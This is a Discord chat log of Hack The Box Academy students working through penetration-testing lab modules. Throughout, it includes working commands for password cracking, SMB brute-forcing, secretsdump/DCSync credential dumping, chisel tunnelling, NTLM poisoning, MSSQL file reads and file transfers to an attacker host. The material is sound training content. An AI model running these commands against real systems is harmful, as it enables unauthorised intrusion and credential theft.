#modules
set up your own machine and connect through the VPN
where? i tried doing VirtualBox but im too dumb to figure it out


I dont want to sound mean but if thats a hurdle for you right now you may not be ready for htb
ik ik but i dont get what the error means
decent amount of foundational knowledge is pretty necessary, and setting up a local vm is one of em
For the second question of the IPMI module, when I try to find the password for the given hash, I get this error after I typed the following command:
hashcat -m 7300 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Hashfile 'hash.txt' on line 1 (admin:...4a8295c6a9e3b8e4f8b0cb8660419892): Token length exception
I created the 'hash.txt' file myself
hashcat gets grumpy often if you include a username in there without adding --username
sometimes even then
so do I need to change my hash.txt file at all?
if adding --username doesnt work, try removing the admin: and having JUST the hash
or also try JTR
hello y'all, I'm having issues to achieve the exercise Web Server Pivoting with Rpivot from Pivoting, Tunneling, and Port Forwarding module, a little bit of context, I had set up the server & client.py accordingly, and when I establish the connection to the target the browser is opened but not reachable, receiving a time out error
any idea, clue, thought..!!!
jtr can work too, but its a good idea to learn hashcat quirks for the future
its more powerful with GPU configuration yea
nvm i just figured it out i needed to install ubuntu.iso lol
Got a new issue when I removed the username too.
maybe you could try creating a username file with only the username in it
idk tho
guys how does nmap work?
isn't 7300 the right mode for IMPI
call me dumb but... i got into htb yesterday
*IPMI
yes
try to remove "\n" character if its in there
cat hash_too.txt | tr -d '\n' | sponge hash_too.txt
YES i finally installed VirtualBox !! 😎
lol myb
I'm currently on the metasploit module / Payloads. The Q is "Exploit the Apache Druid service and find the flag.txt file. Submit the contents of this file as the answer."
when I run nmap. I get the following result:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
What I'm having a hard time to grasp is. How am I supposed to make the connection to utilize the exploit for Apache Druid (if it wasn't mentioned in the question), based out of that info?
Am I missing something really obvious in my enumeration?
Anyone else having trouble starting their instance machine on pawnbox
works for me
So strange. I can't ask for help on the academy.htb page because the message block doesn't appear
If you read this you will get to know at least on which port the service is listening so you can try to fingerprint the version:
https://druid.apache.org/docs/latest/tutorials/
another probably "smart" way is when selecting a module from Metasploit you can read the default options. Unless the administrator changed the listening port to something else other than the default one you can find it out and start fingerprinting the service
ok
I think the block in my head right now is more of how do I know what exploit to look for in metasploit, only based out of the nmap enumeration? The question in this case kinda gives away what to look for in metasploit
if that make any sense
I'm no seeing the matrix right now..
trial and error sorta
well it really gives only one option metasploit
matching up versions n such
(in this case at least)
sometimes a metasploit exploit just isnt gunna be the path anyways
Can someone help me? I can't connect to any instance of a pwnbox and I am having issues with contacting support too
.\
Hi y'all, who can give me a hand with Web Server Pivoting with Rpivot section from Pivoting module?
🔥
Not sure, but you could give it a try and see if it throws the same error.
┌──(shadowalker㉿kali)-[~/Downloads]
└─$ crackmapexec smb 10.129.203.10 -u users.list -p pws.list --local-auth
SMB 10.129.203.10 445 WIN-HARD [*] Windows 10.0 Build 17763 x64 (name:WIN-HARD) (domain:WIN-HARD) (signing:False) (SMBv1:False)
SMB 10.129.203.10 445 WIN-HARD [+] WIN-HARD\aartjan:liverpool
┌──(shadowalker㉿kali)-[~/Downloads]
└─$ crackmapexec smb 10.129.203.10 -u users.list -p rockyou.txt --local-auth
SMB 10.129.203.10 445 WIN-HARD [*] Windows 10.0 Build 17763 x64 (name:WIN-HARD) (domain:WIN-HARD) (signing:False) (SMBv1:False)
SMB 10.129.203.10 445 WIN-HARD [+] WIN-HARD\aartjan:123456
┌──(shadowalker㉿kali)-[~/Downloads]
└─$ crackmapexec smb 10.129.203.10 -u users.list -p pws.list
SMB 10.129.203.10 445 WIN-HARD [*] Windows 10.0 Build 17763 x64 (name:WIN-HARD) (domain:WIN-HARD) (signing:False) (SMBv1:False)
SMB 10.129.203.10 445 WIN-HARD [+] WIN-HARD\aartjan:liverpool
its giving false positive
anyone know why
┌──(shadowalker㉿kali)-[~/Downloads]
└─$ hydra -L users.list -P pws.list smb://10.129.203.10
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-21 15:14:53
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 26307 login tries (l:79/p:333), ~26307 tries per task
[DATA] attacking smb://10.129.203.10:445/
[ERROR] invalid reply from target smb://10.129.203.10:445/
and hydra its like this
did you verify the module was actually imported?
All these new web modules are cool. 🤩🔥
smb2
ah weird never seen it before try another version of cme
can u suggest one
@acoustic owl is probably done with soc analyst already
No, not yet
HAHA
This path is also not yet complete
So I definitely still lack knowledge in this field.
how to solve the second question in Navigation in Linux Fundamentals? What is the index number of the "sudoers" file in the "/etc" directory? I tried ls -i and stat commands but it says wrong answer. Pls help me
there you go
but it says "wrong answer"
He said he already tried and it didn't accept the answer
Literally read just above where he shows using stat
i do not think the index of the sudoers file is above 1 million entries
send screenshot of ls -i
anyone who I can ask about rpivot
ls -i /etc/sudoers
I'm assuming they're in the /etc/ folder
Are you connected to the machine?
ok
ok he’s getting the sudoers of pwnbox
I meant are you ssh into the spawned ip
🤣
no
I am connected to my pwnbox
its the sudoers from target
no
just tested
and as i did remember it was below 1 million
it works now! thank you
It's called, reading all the instructions on the page
Literally that is how you're meant to go through the modules
Otherwise you're just enumerating your own system
anyone, could have any idea what could be wrong here?
will there be a cert for the new SOC Analyst path?
Yes
But has not yet been announced.
how is "SSH to IP with user USER and password PASSWORD" NOT specifying to connect to it??
I thought that I could find answers on my own machine
ye I get that mixup. Im just confused about the confidence to say it doesnt say to connect to the machine and then say it only has that message to SSH in
anyone who have completed the rpivot exercise, I'm completely stuck and struggling with it..!!!
I'd like to discuss what I did so far and understand what could be going on..!!!
anyone willing to help..!!!
Forgive me for asking a silly question however, the second part of this is the ntlm hash for the krbtgt account correct(31d6cfe0d16ae931b73c59d7e0c089c0)?
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sure is
For context, I am doing the Documentation & Reporting Practice Lab module which is part of the HTB CPTS track. The question is
“After achieving Domain Admin, submit the NTLM hash of the KRBTGT account.”
I cracked the NTDS file and found the krbtgt account hash, however it keeps saying "incorrect answer". I don't have any extra spaces in my answer either.
hmmm i'm not sure how similar the labs are for each person, but that's not the hash I had
I have notes on the lab, so if you want a sanity check, you can dm
I believe you, I probably just used the wrong method for retrieving it ig
I used secretsdump
same that's how I cracked the ntds
try DCSync from mimikatz ?
yup just did it and it worked
i dont know if it will return a different value (it should not xd)
should it? wow
im wondering
yeah idk why I got a different answer
will do!
did you use secrets dump like impacket-secretsdump -just-dc-user inlanefreight/KRBTGT inlanefreight/<USER>:<PASSWORD>@172.16.5.5
what i think is that you dumped krbtgt ntlm from another machine
and with dcsync attack it dumped the one from the domain controller
that makes sense
which is the intended from a dcsync attack lol
what is obv is different hashes for the same user = different machines xD
i do not really know if this makes sense, i am far away from that module
but im confused
secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
I dun goofed, I used "secretsdump.py -ntds ntds.dit -system SYS Local", went back and retraced my steps
ahhhh
ok ok cool
it makes sense now
thx!
I think it gave me the accounts whose hashes were stored but not synced. I probably had an outdated krbtgt ticket right? Thanks @fringe shell and @sly dome!
i think so
i cannot find other answer
but still concerned, fk i want to reach those modules!!!!
lets keep working.
yo pups
Man I'm absolutely frothing this platform right now. About half way through CPTS and it's literally the thing I look forward to each day sitting down to smash out some learning. Admittedly I'm taking it slowly to write good notes and patch my many knowledge gaps (of which there are many) outside of security in general IT but man, cannot get enough of this shit right now. Can't wait to sit CPTS and hook into SOC. Will be super interesting to see how these certs play out in the job market in the coming years.
Just wanted to say thanks to the peeps in here that seem to be the "regulars" helping everyone out.
bub ?
🤦♂️
HELO guys once again
┌──(shadowalker㉿kali)-[~]
└─$ smbclient -N -L //10.129.203.10
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Home Disk
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.203.10 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
i can list the shares with nul session
but i cannot use smbmap
└─$ smbmap -H 10.129.203.10
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)
and enum4linux-ng its saying thats is using random username and with every user name its said
what module and section are you working on?
with smbmap u need -u ''
Skill assessment hard lab
Tried to brut force the service
I got nothing
Im trying to use the null session
skill assessment of what module?
Attack common services
hi
what did you try for your brute force?
Crackmap it giving the first cred username/password as true
were you using a user list or a specific username?
Are you on the first question?
Im not looking into question
Im trying to get was i can without looking into question
Cuz sometimes it will gives you hints
I started the machine
Nmap 2 services looks interesting
Rdp mssql SMB
I started with smb to look what i can get
Hi
hi, who are HTB moderator in this channel, to ask some about Rpivot exercise?
How is it that the firewall does not allow any package to reach the device, but I have a response? This is the basis of the response if there is no package received.
Did you specify the proxy configuration in proxychains file?
hey guys i set up double pivoting in the last module.
and when i did an proxychains nmap, i can see some ports are open.
however after awhile, the ports become close. any idea why?
i.e.: port 22 was open initially. after awhile, i perform nmap again, it showed me close
If you use metasploit for double pivoting, it might be because the connection created by metasploit is not stable
in WEB ATTACKS , Advanced File Disclosure exercise I've used CDATA method but I can't get the flag ,is there a problem in my code ?
Leverage membership in the DnsAdmins group to escalate privileges. Submit the contents of the flag located at c:\Users\Administrator\Desktop\DnsAdmins\flag.txt
( I have escalated the privileges and am in current domain admins group but still can't read the flag.txt ) can anyone help me ?
are you running an elevated prompt? Anyway worked for me with a reverse shell
elevated prompt ? meaning ?
As admin
If you did everything in that step try to sign off in windows rdp machine
And then rdp back in
i needed to do that, while i was in administrator group i did not have privileges until i did that @young trellis
I did login/logout and also gpupdate /force but also got acces denied
@devout torrent
and also ran the powershell as admin also couldn't get the access
is the lab broken or I am missing something
Maybe restart it and try again, but yea i needed to press signoff in the start menu and then log back in to get it to work
Hey, someone has done "MODERN WEB EXPLOITATION TECHNIQUES - SSRF Basic Filter Bypasses" and available in pm?
DM me
Can anyone help with password mutation please? Described the problem on the forum https://forum.hackthebox.com/t/password-attacks-password-mutations/298653
I’m stuck and can’t apply a list of rules to a list of passwords to mutate them. After entering the command: hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list I get an empty mut_password.list file without any words. I also tried: hashcat --force password.list -r custom.rule --stdout But then I got the erro...
Hello any one done with coder box?
read #welcome and #rules after that use /verify at #bot-commands and ask that at #boxes
make sure you don't have any issue with both the password.list and custom.rule file
also that's the right command
Hello everyone there will by a python -m http.server in powershell? Im running a github powershell server but i have access not allowed
Hello guys, can anyone help me with this question please as im confused:
ps: I do not want the answer just someone to make it more clear to me to understand
Module: WORKING WITH IDS / IPS
Table of contents: Suricata Rule Development Part 2 (Encrypted Traffic)
Question:
There is a file named trickbot.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to a certain variation of the Trickbot malware. Enter the precise string that should be specified in the content keyword of the rule with sid 100299 within the local.rules file so that an alert is triggered as your answer.
if you want to upload file from a target windows machine and if you have rdp you can try updog
How can do a POST request in powershell, im trying a lot of things but nothings work!
Invoke-RestMethod -Uri $url -Method Post -InFile $rutaArchivo
you can do Invoke-WebRequest -Uri $url -Method POST -Body $data
Invoke-WebRequest : Cannot send a content-body with this verb-type.
At line:1 char:1
+ Invoke-WebRequest -Uri http://10.10.14.190:8000/uploads -Body poc.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Invoke-WebRequest], ProtocolViolationException
+ FullyQualifiedErrorId : System.Net.ProtocolViolationException,Microsoft.PowerShell.Commands.InvokeWebRequestComm
and
I think its -OutFile instead of -Body
i.e.: Invoke-WebRequest -Uri http://10.10.14.190:8000/uploads -OutFile poc.txt
is doing a GET
$postParams = @{username='me';moredata='qwerty'}
Invoke-WebRequest -Uri http://example.com/foobar -Method POST -Body $postParams
i want to POST a FILe
This may seem like a bait, but updog is an actual tool
Hi, can someone help me with this Assessment?
Module : Broken Authentication, Default Credentials
I have tried the default username file from seclists and rockyou but can't seem to find the password? Can someone tell me which file to use?
Im using python3 -m uploadserver
i still don't get the updog joke 🤣
hint check one of the given link in that section
also a another hint is you don't need to do any brute forcing
Hello, can somebody give me a tip how to solve : Log in as Grace and find the cookies for the slacktestapp.com website. Use the cookie to log in into slacktestapp.com from a browser within the RDP session and submit the flag. ? Im getting error: RDP disconnected! 1800 Your computer could not connect to another console session on the remote computer because you already have a console session in progress. in mRemotenG app
xfreerdp /v:10.129.203.122 /u:grace /p:'Pass' /dynamic-resolution
in pass you have to put the password that you obtain in the previous section
Thank you 🙂
Im stuck in this exercise 2 hours is to f*cking
You mean the SCADA Strangelove repo? Used that csv as well, didn't seem to work.
not sure about the name but there is only something like 4 cred for that service
who can help me this https://academy.hackthebox.com/module/113/section/2164
Thanks, was so stuck on hydra that didn't try. Was able to complete now.
You need to b64 encode the file you're trying to upload and store it in a variable and supply it to -Body $b64.
$b64 = [System.convert]::ToBase64String((Get-Content -Path '.\poc.txt' -Encoding Byte))
Invoke-WebRequest -Uri $uri -Method POST -Body $b64
How do I find websites that can be sql injection? Every web that I try it’s not good and it works with sql ? I tried like the module episode
Can someone help Module: Active Directory Enumeration & Attacks, Section: LLMNR/NBT-NS Poisoning - from Windows. I cant capture the NTLMv2 hash with the tools Invoke-Inveigh or Inveigh.exe
the tools are executed correctly?
.\Inveigh.exe is not running, Invoke-Inveigh runs but nothing after 15 min
hint make sure you are using the right "poisoning" mode
What's the exact command you're running. Would be more helpful-
I have a question, all windows protocols that use ntlm or ntlmv2 are vulnerable to pth attack or there can be restricted?
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y the same from the example
You can't pth with ntlmv2.
As long as there's ntlm authentication, you can pth.
There can be restriction but I don't know the deeps.
How can i know if some protocol (like rdp, or smb) have ntlm authentication?
Nearly three years ago, I wrote a post named “Pass-the-Hash is Dead: Long Live Pass-the-Hash” that detailed some operational implications of Microsoft’s KB2871997 patch. A specific sentence in the…
This article is great for explaining when pth works
Also checkout the PtH section of the module password attacks
do you mean i need an option for Invoke-Inveigh -NBNS Y -ConsoleOutput Y -FileOutput Y
The command seems right, is it running in an elevated shell?
i run it in powershell as user htb-student
is htb-student an administrator in that machine?
Tbh, I don't remember if you need administrator shell for Inveigh to work. But, if you're an administrator, open powershell in administrator and try running it.
your right, thanks
Go to ippsec.rocks and search for SQLi there.
Then you will find machines that are vulnerable to SQLi.
i have a feeling he's talking about actual websites lol
Then I hope for his sake that he participates in a BugBounty program.
If he actually tries to hack his girlfriend's Instagram account, he'll probably get a visit from the police faster than he can hit enter 🤪
Lol
In my country the police didn’t give a shit about hack web
They don’t care
So who can help me ?
I tried like the module
Hi can someone help me with the sqlmap essentials in the final flag? i already found the payload but im doing something wrong..
this is all for ethical hacking my dude... no one in here gonna help ya and continuing will get you a swift ban i imagine
Ahh ok
You're on the wrong server
Ok let’s talk about another thing
The advice on doing bug bounty is so you can do it legit. Police may not care, but doesn't mean you can't be in legal issues for days
How do I bypass cloud flare
Thats irrelevant to this channel
So what is the purpose of this channel?
Talking about and giving advice on the academy modules
how to access retired machines? I can't access to it .
You can use fuzz tools like ffuf in parrot
VIP subscription
I don’t have it
You need a subscription on the main plattform
Where I fine it ?
?
pay money?
🤦
Yes
Yes
it’s friday
Also most modules will have a link to the tool in the introduction section
You mean script kiddies have weekend? 🤪
it has to be
I need to do practice related to the OSCP which machine you recommended to me?
the ones from PG
in offensive security platform?
yes
did you take the certificate?
ok. No need to do practice in hack the box?
not at all but no one can stop you
Thank you. I will do their practice.
Hey guys, is they any HackTheBox labs or vm list that focus on getting access?
Search on ippsec.rocks for the desired topic. The website will then show you which machines you can solve for that topic.
Hello! I'm currently doing the CPTS path and I'm stuck at "Attacking Common Applications: Skills Assessment I". I found the bat file, but the only command I can execute is dir. Nothing else works, just returns blank output. Not sure what to do here, can someone give me a hint?
you can dm me
I'm stuck on the Miscellaneous Techniques section of the Windows Privilege Escalation module. Not sure if it's the vague question or me doing something wrong, but it's not accepting any of the answers I provide it. Could someone give me a nudge?
guys is it normal when i try to access the terminal it keeps like loading for some time and then closes?
I'm assuming you mean pwnbox?
no
its not the expected behavior
we can’t determine from here your problem
Again this is very limited context
do i give it more cpu?
try in Linux related servers
What vm are you using?
oracle
Could be a cpu issue, ram issue
Could be that the download got corrupted
¯_(ツ)_/¯
everything else works fine but the terminal
wait it says software update
imma install it tbh
Ugh gui update
its a visual update? 💀
Yeah lol that's why I'm saying it's the best you got
But more than likely not gonna fix your issue
there's always xterm 👀
😳
as well as the tty
what is that?
the standard X11 terminal emulator
They're having trouble launching a terminal in general
I just completed the introduction module now it wont give me another terminal to use for introduction to Linux module, any way around this 😦
loads and closes because yes
Otherwise you're limited to one spawn per day
It's likely you don't have enough resources allocated tbh
do i give him another one?
Yea your system had 8 total so it won't hurt
can anyone lend a hand for attacking enterprise networks? I'm at the Active Directory Compromise module, and I'm supposed to add a fake spn and then kerberoast the user
why don’t you give him everything
¯_(ツ)_/¯
I can't solve "How many total packages are installed on target system? ". I tried apt list | wc -l but it gives wrong answer
apt list —installed
it says 378 but it's still wrong
I'm supremely stuck on the Firewall and IDS/IPS Evasion - Hard Lab from the Network Enumeration with NMAP module; I spent at least 10 hours on this lab and would LOVE some help.
Trying to enumerate attack surface I've run:
-sS -p- -Pn -T4 -n --disable-arp-pings --packet-trace -v --reason
only found TCP 22 & 80 are OPEN. I've checked the saved output for any type=3/code=3 responses to check for filtered traffic that might be worth digging into. I found a port but if I try to add version scanning (-sV) or netcat on that port I get no response.
I've tried considering that the Hard Lab may be building on the Medium Lab and tried enumerating the UDP attack surface which almost immediately gets me locked out due to the limited number of attempts available on the target. Trying a more targeted approach I scanned just UDP 53 and that's apparently closed as well.
I've seen tips from other community members that you should attempt to build on the command used for the Easy Lab (OS Detection) which doesn't appear (to me) to have any meaningful carry over flags that I haven't already tried.
I've also seen tips from the community that indicate that if you down scan from the HTBA provided VM (in browser) that you won't get the correct results. Another SYN Scan from that VM didn't yield any differences in scans run from my local VM.
Finally I've seen another tip for this lab about making use of proxies to avoid getting locked out???? This seems like a red herring since proxies haven't been covered WRT using NMAP in any practical way and this is only the second module in the entire path; that would be quite the curve ball but maybe I'm being naïve?
I honestly can't tell if I'm missing the point of the lesson, the question is poorly written, there's a bug in the lab, or this is a "stump the chump" scenario and I'm learning I'm a chump.
Can anyone help?
apt list —installed | grep -w “/“ | wc -l
try now
There are two - in the --installed flag; if you're getting 0 that might be the source of your problem
still does not work
the steps you’re supposed to use for that section have already been given in the section just before the skill assessments
go through it again
what happens if you run apt list --installed | wc -l?
it outputs 738 but I google it and used dpkg to list that and count that and now it outputs 737 which is the right answer but thanks for your help
wc -l might be counting a header row which threw your count off by 1 :/
It would appear that I somehow skipped over this entire lesson in this module....I think there might be a UI bug. Thanks for the tip; I wouldn't have thought to go back and check!
Okay I somehow skipped over 5 lessons in this module?!??!?!??!
I don' t know how I get myself dressed in the morning...
Attacking Common Applications - Skill assessment I
I can run dir command but type is not working to read the flag. I can't run any other command. Please help me.
are you sure you’re in the same directory as the flag?
It is a different directory, and I can see it in dir output. But type command is not working in the current directory and in the destination directory neither.
||type C:\path to flag ||
this?
Nope. And I can't use type on random file in the current directory.
you can dm me
which channel should I use to ask related to the machine issue?
If i end all the Penetration Tester do i get the certification at the end?
heloo guys on attack common services hard lab
is there any HTB moderator in this group?, cuz I found a mistake/error in the IP addressing described in the Rpivot section diagram.....
what about it?
bro 💀
i enabled the xp_cmdshell to read the file in the linked services
ok.
my question is can i just use this cmnd to read the file without enabling the xp_cmdshell
EXEC('SELECT * FROM OPENROWSET(BULK N''C:\Users\Administrator\Desktop\flag.txt'', SINGLE_CLOB) AS Contents;') AT [LOCAL.TEST.LINKED.SRV];
Curious.. if i need to send a file remotely , how do i do that via python ? i know theres a quick one liner to share curent folder
until I got understood, not you can not....
python3 -m http.server
this aint normal
but im not using xp_cmd shell on the cmnd
from linux to windows or windows to linux
or linux to linux
linux to linux
python3 -m http.server
in the directory you want to share a file
and on the target machine
it wget http://IP_ADRESS:8000/YOUR_FILE
hey all, im struggling with a strange issue. So I am doing the AD Enumeration and attacks module, got rdp access to host 1, and am trying to import powerview with the following powershell command:
Import-Module C:\path\to\PowerView.ps1
which seems like it completed successfully but then when I try running the command:
Get-DomainUser it says that the command is not found
not sure what i could be doing wrong. The annoying part is im reviewing this module and i've solved it before i just cant remember how 😆
Working on the module "Cracking Into HackTheBox", specifically HTTP methods/codes. Still a bit confused on curl, GET and POST
curl naturally does those get functions, correct? but it also has the option to POST as well?
does that sound accurate?
Correct. There is an -X argument that lets you set the request method
ahhh gotcha. POST is used for login forms etc, but can also be used to send through word docs, pdfs, other forms of binary data?
so how is PUT different?
POST is used to send forms and data, yes. Binary data like documents and pictures is usually sent as multipart/form-data
Burp is a great tool that lets you see exactly what a request looks like
As for PUT, have a look here: https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/PUT
ive been just using the dev tools on web browser to view those requests
ahhh gotcha
Burp is similar, except with way more features and tools
and you're going to get familiar with it if you continue doing modules and boxes
perfect, very excited to be in this program.
got the undergrad and masters, comptia a+, net, sec, linux
figured it was about time to finally do this
you already did those?
hello
ntlm relays attacks
ntlmrelayx> [*] HTTPD(80): Client requested path: /xml;
[*] HTTPD(80): Connection from 172.16.119.80 controlled, attacking target mssql://*****
[-] HTTPD(80): Exception in HTTP request handler: [('SSL routines', '', 'no protocols available')]
Anyone have the same problem ?
for the crackmapexec module skills assessment, i can't seem to get my local chisel to connect to the server's chisel. in fact, for whatever reason, i can't even ping the server i'm supposed to be able to chisel too. i'm 100% positive it's not a vpn issue, because i can go to other modules with the same VPN file process running and don't have any issues. the advice and commands given in the text don't really seem to help
the command i run on my machine looks like this: sudo ./chisel client 10.129.204.182:8080 socks , the end of my /etc/proxychains.conf looks like this: socks5 127.0.0.1 1080 (with no other i'm not sure if i have the port numbers wrong, but i've tried every possible configuration of 1080 and 8080 in both the chisel command and the /etc/proxychains.conf file.
anyone have an idea of where i'm making a mistake?
Damn coder box its getting on my nerves
Hello mates
i'd recommend - https://academy.hackthebox.com/module/details/158
||try adding a -v after client||
Hey, im on Active Directory Enumeration & Attacks: Privileged Access i cant connect to the ssh: "open a PowerShell console on MS01 and SSH to 172.16.5.225 with the credentials htb-student:HTB_@cademy_stdnt!."
why are you trying to ssh? it says rdp
i need to run mssqlclient.py for the last question
Can someone check if the ssh is working?
thank you very much
this at least gives a "bound proxy" but i still have the "no route to host" error
what command did you use to setup the server?
i had an issue to, rereading and redoing the lab to verify i didn't miss anything
hm its strange
hello guys, i'm in the pivoting module - SOCKS5 TUNNELING WITH CHISEL, this error apear when i run ./chisel in the server, someone knows who i solve this?
statically compile it
golang changed up some of its compilation stuff
CGOENABLED=0 go build -ldflags="-s -w -linkmode 'external' -extldflags '-static'"
can I send u DM?
nah im working
I did the homework of providing how to statically link it, you should be good to go from there
./chisel server --reverse with the output screenshot attached
I got it here, thanks bro
you set up a listener on 8080, why are you trying to connect to 1080 on your client?
your issue was the absence of -v, connecting to the wrong port, and setting up a reverse connection wrong
i still fail to connect to the chisel server with sudo ./chisel client -v 10.129.204.182:8080 socks though, i have the listener setup, and ive tried both using port 1080 and port 8080 in the /etc/proxychains4.conf file
you set up a --reverse proxy on the server
so have to specify the same on the client
./chisel client -v 10.129.204.182:8080 R:socks
hello
Could anyone help me sort out where I am going wrong on my metasploit set-up for WINDOWS PRIVILEGE ESCALATION - Windows Server?
Can someone help me? Module Windows Privilege Escalation section "Citrix Breakout".
When I try to run the smbserver on my ubuntu machine (connection through RDP protocol), it doesn't find the impacket module. I tried to install the impacket module on the ubuntu machine but it doesn't have internet access so I can't do anything.
Solved
I'm dumb 💀
Working on Intro to Python 3, stuck on Code Block 2 in the first set of questions, can anyone help on this? In "Code block 2" the blank should be filled with what, to output all numbers in a terminal?
It's in the Conditional Statements and Loops module
take a look at the for-each loop section above
for AD Enumeration and Attacks, how did yall bypass the antivirus to get ||MimiKatz|| working on the second skills assessment? I had to do the attack manually with file transfer over ||nc|| but wondering if anyone managed to get it another way
guys need anyone to help me to solve this lab please "Firewall and IDS/IPS Evasion - Hard Lab "
HTB academy is really slow today. is anyone else having the same experience?
guys?
My notes only say I had a meterpreter shell as admin at that point. It doesn't mention anything about evasion.
use ./<filename> for files under current directory
some targets don't reply to pings
so what do i do
module?
the title
this place is for the htb academy
i believe you have other servers to ask questions for boxes
is it just me or is HTB academy very slow today?
Stuck on web attacks skill assessment
||trying to change admins password with the idor vuln but every time i try it says access denied||
anyone know why i can't get nc.exe to copy over even though i get the 200 and the file shows up when i do a ls or dir it shows nc.exe with 0 bytes
through what
without any context this sounds like you are having a stroke
hint: you'll need 2 things for that
||uuid|| and a ||token||
That's what I was thinking but I'm struggling with the second part. Now that I know that I was on the right track I'll keep looking.
Thanks
How do I mark a large message as a spoiler? 😭
shoot me a dm, that's definitely too much spoiler
even with a spoiler tag admin would not be happy with that much spoiler
I see
hey guys im new here could someone help me out
If you say in which module, which section, which question you need help and then say what you have already tried, your chances of getting help are very good.
Is there a way I can buy cubes or access to a specific course without subscribing, I have 4 courses in mind that I can access all behind the student subscription and then one I want to do which is Tier III, and I want to only get that one and then I'll probably be done with academy and take an exam
Yes, you can buy cubes without subscription
it is actually cheaper for me to subscribe and get 500 cubes for the web exploitation course than me just buy 500 cubes.
77 aud for 500 cubes, or purchase gold and just cancel it and that's $67
whack
Yes, the subscription is definitely cheaper
i went thru the step by step and when i try and copy the nc.exe after setting up the http server i get the 200 on the http server terminal but when i list out the directory where i copy it to i get a length of 0... for the beginners Archetype
Hello, I'm just curious about a part in the Hard Lab in Password Attacks. How did y'all get a particular file off one of the target hosts? I successfully did it by encoding/decoding base64. Is that what everyone else did? Ty
id post a screenshot but ...
read #welcome and #rules after that use /verify at #bot-commands to verify your account and send screenshot here
the ||vhd|| file? there are multiple ways to get that, from using /drive tag in xfreerdp or a tool like updog
i pulled a binary from github to try and copy it over and i tried to push the nc.exe from the windows binaries already on the kali box
which module and section are you on?
when i try and pull the nc.exe file from my http.server i get the 200 but in the sql box it gets stuck
Archetype
tier 2
ask that in #starting-point
this channel is for HTB academy modules not main platform
Module : Attacking Common Services
Attacking Email Services
i got the username m****** and i tried to brute force for the password using the pws.txt and rockyou.txt
on both smtp and pop3
i'm stuck in this easy task
U couldn't brute force?
Can you send me the whole cmd
i need help with file inclusion module
For the Footprinting lab hard...when you do the nmap scan, how many ports are you all getting. I am just getting five, but when I look at some writeups for this lab, I am told that there are more than just five ports. I included '-p-' and '-p 1-65535' in my scans and I still get the same five ports. Not finding any snmp ports
what is wrong with my shell it doesnt work
have you tried a udp scan?
is there any way to refund a module ?
this Broken Authentication is making me cry
why its so dam hard
Nope. I just now learned that the '-p-' nmap flag doesn't include udp ports. That's wild to me
yes😉
i mean you can ask support but i doubt it 🤷♂️
and yes some modules will kick you in the balls
u are laughing but im crying
I want to learn Server Side now
you will get used to being railed by modules if you will be on the academy for a while
its been 44% till now
you have to give us more information than that
i sucessfully uploaded a simple web shell on target server but for some reason it doesnt work
i used log poisoning to create a more permanent web shell here
but when i try to use that shell it doesnt "work"
don’t try uploading a shell first.. try to read phpinfo and then upload a shell. phpinfo will tell you what functions are blocked as well
but it worked in when i poison log right, why doesnt the same work when i run with my file
you can use nc socat these commands to get a reverse shell
actually i was able to use php filter and i got the php configuration file
what module and section are you on?
im doing file inclusion and log poisoning section
i wanna know what is preventing me from using the shell
it's an LFI module so how tf did you upload a shell? 🤣
a shell here only work through log poisoning hence the section name
i didnt exactly "upload" it but i used the command execution to "create" (using echo) to make more permanent shell
like they told here
maybe i should've tried reverse shell but it is still puzzling me why isnt my shell working
not sure what method that part shows but that isn't the best one
why would you "write" a shell when you have RCE when you can just get a rev shell or if there is curl on the target machine you can get a better shell with curl pipe to bash
also i don't think you can get a rev shell in this
yep just check it's docker through public ip you can't get a rev shell
again i wrote a shell directly to web directory and tried to run command but still something is stopping me and it gives no output
or the target web server technology doesn't support that type of shell
||sudo nmap -sU -F ip -v||
how
but with log poisoning it worked
how exactly are they blocking my shell
welp if something is unintended you just can't do it 🤣
how did they block it though
weird where is my $_GET
bruh they are replacing my $_GET
?
uhhh i give up they are sanitizing my input? weird
so when I try to do an snmp scan I get no response, even when I reset the IP.
is that the correct community string to use?
😉😉
I got this example from the snmp lab and they don't show any other ways you can write the snmp scan
but they show ways to bruteforce community strings
😉😉
So the 'braa' command could be an option? that's the only other tool I am seeing in the SNMP lab
really?
😉
and 'onesixtyone' too
type this in your terminal
```echo "$term is the value of "'$term'```
and you'll see the problem with $ in linux commands and doublequotes
OHHHH
you could use that for bruteforcing community strings
i think
so i should've escaped $
yea the $ probably doesnt arrive in the shell, maybe try the command locally first
apparently in single quotes it works but not in double quotes or you find another way to escape it
thanks, that was so confusing now it makes sense
Did I write the right scan?
yes
So is 'nixHARD' the community string I need to run the 'braa' command?
no
Oh okay . the notes mentioned a community string I would need. How would I determine what the community string is
it’s already in the output of this command
Hello, I need help on Documentation & Reporting Practice Lab first question, can anyone give me hint or the way to get the admin cred? i tried everything i can to login but incorrect 
???
😉
